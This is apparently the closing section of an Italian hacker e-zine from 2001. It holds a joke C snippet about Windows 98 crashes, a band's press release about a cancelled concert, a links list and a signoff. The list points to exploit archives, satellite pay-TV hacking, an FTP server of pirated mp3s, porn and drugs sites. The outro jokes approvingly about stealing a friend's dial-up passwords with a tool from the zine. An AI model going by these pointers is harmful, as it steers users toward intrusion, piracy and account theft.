/* printf("Benvenuto su Windows 3.11"); */
/* printf("Benvenuto su Windows 95"); */
printf("Benvenuto su Windows 98");
if (sistema_ancora_in_piedi())
crash(al_prompt_di_ms_dos);
else
system_memory =3D open("a:\swp0001.swp",
O_CREATE);
while(qualcosa)
{
sleep(5);
aspetta_input_utente();
sleep(5);
processa_input();
sleep(5);
}
crea_errore_protezione_generale();
}
// ROTFL!!! :)))
// bye,
// Ð.
/===========================::=============================::=================/
/ /Comunicato stampa dell'agenzia dei Death SS! / To syn /
/===========================::=============================::=================/
Dato che sono iscritto alla m.list dei Death s.s. (non vi piacciono?)
Un giorno vado a controllare e trovo questa fattispecie ma figatona
di comunicato. Senza aggiungere altro vi riporto il tutto! :) Saluti.
Summer 2001
....eccovi una copia
del comunicato stampa ufficiale dell'agenzia dei Death SS
in merito alla faccenda... a voi trarre le conclusioni!
*
*
UN CONSIGLIERE DEL COMUNE DI SAVONA HA MOLTO POCO "VELATAMENTE " NEGATO
AGLI
ORGANIZZATORI DELL'EVENTO OMS 2001 (OFFICINE MUSICALI SAVONESI) LA
POSSIBILITA' DI FARE ESIBIRE , IL 28 LUGLIO P.V., IL GRUPPO DEATH SS,
ADDUCENDO LA SCUSA CHE IL GRUPPO PROPONE MUSICA TROPPO SATANICA, SI
VESTE
IN
MODO ESTREMO E POTREBBE INCITARE I RAGAZZINI A COMPIERE ATTI ESTREMI!
DA NOTARE CHE COMUNQUE SI ESIBIRANNO GLI EXTREMA, NOTA BAND METAL NON
CERTO
ALL'ACQUA DI ROSE, CHE GIA' ERANO IN CARTELLONE IL 28 LUGLIO PRIMA DEI
DEATH SS, L'EVENTO SARA' PUBBLICIZZATO COME CONCERTO DI "ROCK
ALTERNATIVO"!
L'EVENTO SI SVOLGERA' AL PORTO DI SAVONA, CONSIDERATA COME LA
"BOMBONIERA"
DELLA CITTADINA, FORSE IL CONSIGLIERE, PIU' CHE AD ATTI VIOLENTI
DETTATI
DALL'ASCOLTO DI MUSICA PESANTE ( SPERIAMOLO, SENNO' SIGNIFICHEREBBE CHE
DAVVERO I DEATH SS IN ITALIA, SONO ANCORA VISTI E CONSIDERATI COME PIU'
PERICOLOSI DI MARYLIN MANSON) TREMAVA ALL'IDEA DI ATTI DI VANDALISMO
CONTRO
LA PARTE PIU' "FIGHETTA" DELLA CITTADINA LIGURE..PROBABILMENTE NON HA
IDEA
DI QUALE SIA IL PUBBLICO DEGLI EXTREMA....
AD OGNI MODO IL CONSIGLIERE SAVONESE DOVREBBE CONSIDERARE:
IL LAVORO SVOLTO DAL GRUPPO IN ANNI ED ANNI DI CARRIERA,
IL LAVORO, TEMPO E COSTI DI CHI GESTISCE LE LORO DATE
IL LAVORO, TEMPO E COSTI DEGLI ORGANIZZATORI SAVONESI E.. SOPRATTUTTO
..... IL PUBBLICO CHE I DEATH SS VUOLE VEDERLI DAL VIVO!
I FAN LIGURI ( E NON SOLO) HANNO DUE ALTERNATIVE: O VANNO AD ALTRI
CONCERTI
CON ULTERIORI AGGRAVI DI SPESE (VIAGGI, ETC) O PICCHETTANO IL COMUNE DI
SAVONA!
/===========================::=============================::=================/
/ /Links / syn /
/===========================::=============================::=================/
Bè anche se piccola spero di aiutarvi con questa "mini-sezionciella".
Dato che mi diverto molto a navigare e scoprire nuovi siti e a volte con
molto successo ho deciso di mettere su in minuscolo spazio dove riportare
alcune delle mie "Conquiste + interessanti" :)
Alcuni gia' li saprete, li ho inseriti solo xchè li reputo molto interessanti.
http://bufferoverflow.org/ exploits
http://unsekurity.virtualave.net/ exploits
http://www.rootshell.com exploits
http://www.energyz.cjb.net/ hack
http://www.securityfocus.com/ hack exploits
http://www.totse.com/en/ various
http://www.mariuana.it/images/simboli/ images about maria
http://zsh.interniq.org/links.php links interessanti
http://www.redbooks.ibm.com/ hack
http://www.gts.dsdom.com/ porn
http://blacksun.box.sk/tutorials.html hack
http://digilander.iol.it/GeniEreditari/ Musica
http://www.piggyvideo.net/ porn
http://www.asssexy.com/index.shtml porn
http://www.pantylinks.com/panty-pics.html porn
http://space.tin.it/scuola/brdeb/Dante/prosa.htm Divina commedia di DAnte!
http://www.italiasat.com hack sat
http://www.avacastoro.isgay.com/ funny script!
http://www.kocaine.net drugs
ftp://mp3:mp3@64.30.198.33/d:/ftp/download mp3
http://guide.supereva.it/en_noir/link music
http://phrew.cjb.net/ various
http://go.to/k3n-mp3 mp3
http://www.cdflash.com/ music
http://www.tuttoscript.net/ script
http://www.adultrevenueservice.com/ istruzioni per i siti xxx
http://www.granniesnfatties.com/ porn
http://www.slutorama.com/ porn
http://www.ampland.com/ porn
http://salernodalnet.cjb.net/ meeting salerno
http://www.beamer.dk/ sat hack
http://www.irdeto-seca.net/ sat hack
http://www.bismark.it/darknet/ exploits
http://digilander.iol.it/bertiroberto vari link interessanti
/===========================::=============================::=================/
/ /Outro / Ghent /
/===========================::=============================::=================/
< OUTRO >
E finita. Fatto un altro passo per la strada che ci accomuna?
Noi speriamo di si'... anche perche' ci tornera' utile... la
conoscenza è
un arma, e vi immaginate quanto puo' essere pericolosa in mano ad un
cretino? Sempre pronti, sempre in guardia...
A rileggerci presto, e saluti e ringraziamenti particolari a syn, al
nostro
rippatore di DVD folle indeciso sul nick da adottare ed ad un losco
tizio
che si collega a scrocco con una flat (dopo essersi fregato le
password
di un suo amico col programmino+file batch che trovate nella sezione
files)
e gode come un ossesso nel ricordarmelo ogni volta che sono online...
bastardo, una sera di queste ti uso come cavia! ;)
---------------------------------------------------------------------------
"Colui che sa, ma non e' consapevole di sapere, dorme.
Sveglialo.
Colui che sa, ed e' consapevole di sapere, e' un saggio.
Ascoltalo.
Colui che non sa, ed e' consapevole di non sapere, e' ignorante.
Insegnagli.
Colui che non sa, e non e' consapevole di non sapere, e' un lamer.
Fuggilo."
*eof*
End
"Noi siamo solo di passaggio..."
"Non hai vinto l'argento, hai perso l'oro."
"Sappi che la mia dottrina se ne fotte di chi sta dopo e chi prima."(Capa Rezza)
Ringraziamenti e saluti
team accaet (www.accaet.da.ru)
Method man
Giada
Carminuccio
Gollo
Scafuti Chip
Immacolata
Nick
Marilyn Manson
Angelocattivo
Linux
Gigi D'Ag
Agnello
Gei rasc' (Jrash)
Fons' a patan'
Il berretto di Armando
La mamma di Armando !
Norma
Pinturicchio
Salernitana
Rutelli
pagnotta
Blinky
NCKxxx
Sara